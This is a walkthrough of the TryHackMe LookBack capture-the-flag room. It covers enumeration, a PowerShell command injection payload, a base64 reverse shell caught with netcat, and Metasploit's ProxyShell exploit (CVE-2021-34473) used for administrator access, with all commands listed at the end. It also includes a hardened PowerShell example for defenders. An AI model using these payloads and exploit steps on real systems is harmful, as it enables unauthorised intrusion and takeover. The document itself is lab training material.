We covered a scenario where we performed vulnerability scanning with Nikto on a vulnerable Windows machine that led to a full compromise using Microsoft Exchange CVE-2021-34473. This was part of TryHackMe LookBack.

The Lookback company has just started the integration with Active Directory. Due to the coming deadline, the system integrator had to rush the deployment of the environment. Can you spot any vulnerabilities?

Initial Reconnaissance

I started with an Nmap scan to identify open ports. The scan revealed ports 80 (HTTP), 135, 139, 443 (HTTPS), 593, and RDP were open. The Nmap output also showed a DNS name for the machine, which I added to my local /etc/hosts file.

Web Enumeration

I first tried accessing the web server on port 80, but it didn't respond. Switching to port 443 (HTTPS), I encountered a certificate warning, accepted the risk, and was presented with an Outlook login page. To find other directories, I used Gobuster (gobuster dir) against the HTTPS server. I had to use the -k option to ignore SSL certificate errors and --exclude-length 0 to drop results with a zero-length response. Gobuster found a /test directory which prompted for a username and password.

Vulnerability Scanning & Initial Access

Recalling the challenge description about vulnerability scanning, I ran Nikto against the web server on port 80, specifying the host with -h. The Nikto scan output revealed the credentials admin:admin. Using these credentials on the /test directory’s login prompt, I gained access and found the first flag.

Command Injection

The page after login had an input field, so I tested it for command injection. Entering a single quote produced a PowerShell error, indicating that the backend used PowerShell and that the injected quote had left a string without a terminator. Entering double quotes produced another error, this time from Get-Content, showing that the input was being inserted into a file path passed to that cmdlet.

To execute commands, I crafted a payload to close the Get-Content command and then pipe my own commands. A working payload for whoami was ') | whoami ; ('. This confirmed command execution as the user admin.
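
The errors above point at the classic PowerShell mistake of building a script string from user input and evaluating it. The following is an added example, not code from the room or the original post: the backend handler, its function names and the base directory are assumptions, and the hardened version shows how the same file-reading feature is written so that input is only ever treated as data.

```powershell
# Added example (not from the TryHackMe room or the original post). The /test
# page's backend is assumed to build a Get-Content call from user input; the
# function names and the base directory below are assumptions.

# Unsafe pattern consistent with the errors described above: the input is
# spliced into a script string, so a quote plus ')' ends the intended command.
function Get-FileUnsafe {
    param([string]$UserInput)
    Invoke-Expression "Get-Content ('$UserInput')"
}

# Hardened version: never build code from input; validate it and pass it as a
# parameter so PowerShell never parses it as script.
function Get-FileSafe {
    param(
        [Parameter(Mandatory)]
        [ValidatePattern('^[A-Za-z0-9_.-]+$')]   # no quotes, slashes or pipes
        [string]$FileName
    )
    $baseDir  = 'C:\inetpub\wwwroot\test\files'   # assumed allow-listed directory
    $fullPath = Join-Path -Path $baseDir -ChildPath $FileName

    # Resolve '..' and confirm the result is still inside the base directory.
    $resolved = [System.IO.Path]::GetFullPath($fullPath)
    if (-not $resolved.StartsWith($baseDir + '\', [System.StringComparison]::OrdinalIgnoreCase)) {
        throw 'Requested path escapes the allowed directory'
    }
    if (-not (Test-Path -LiteralPath $resolved -PathType Leaf)) {
        throw 'No such file'
    }
    # -LiteralPath also disables wildcard expansion of the file name.
    Get-Content -LiteralPath $resolved
}
```

With the hardened function, the single and double quotes that produced the errors in the room are rejected by ValidatePattern before anything is executed, and a name such as '..' is caught by the base-directory check.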

Reverse Shell & User Flag

I generated a PowerShell base64 encoded reverse shell payload using an online tool. I customized the payload with my IP address and a listening port (4545). I set up a Netcat listener (nc -lvnp 4545). I pasted the reverse shell payload into the command injection input field and executed it, successfully receiving a shell. Navigating to C:\Users\Dev\Desktop, I found the user flag (user.txt) and also a todo.txt file.

Privilege Escalation (Exploiting MS Exchange)

The todo.txt file mentioned a pending security update for MS Exchange, indicating a potential vulnerability. I launched Metasploit (msfconsole) and searched for Exchange exploits (search exchange type:exploit). I selected a relevant exploit: exploit/windows/http/exchange_proxyshell_rce.

I configured the exploit options:

  • set EMAIL infra@lookback.thm (or a similar email from notes)
  • set RHOSTS <target_ip>
  • set LPORT 4546
  • set LHOST <my_ip>

Running the exploit (run or exploit) initially seemed to fail but then opened a session. I interacted with the new session (sessions -i <session_id>) and got a shell. Navigating to C:\Users\Administrator\Documents, I found the root flag (flag.txt). The exploit leveraged CVE-2021-34473, a Microsoft Exchange Server remote code execution vulnerability.

Technical Commands

Here are the technical commands I used:

  • nmap <target_ip>
  • sudo nano /etc/hosts
  • gobuster dir -u https://<target_ip_or_dns> -w /usr/share/wordlists/dirbuster/common.txt -k --exclude-length 0
  • nikto -h http://<dns_name>
  • ') | whoami ; (' (for command injection)
  • powershell -e <base64_encoded_payload> (for reverse shell)
  • nc -lvnp 4545
  • whoami (inside the reverse shell)
  • cd C:\Users\Dev\Desktop
  • type user.txt
  • type todo.txt
  • msfconsole
  • search exchange type:exploit
  • use exploit/windows/http/exchange_proxyshell_rce
  • show options
  • set EMAIL infra@lookback.thm
  • set RHOSTS <target_ip>
  • set LPORT 4546
  • set LHOST <attacker_ip>
  • run or exploit
  • sessions -i <session_id>
  • shell (inside Metasploit session)
  • cd C:\Users\Administrator\Documents
  • type flag.txt

TryHackMe LookBack Room Answers

What is the service user flag?
What is the user flag?
What is the root flag?

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.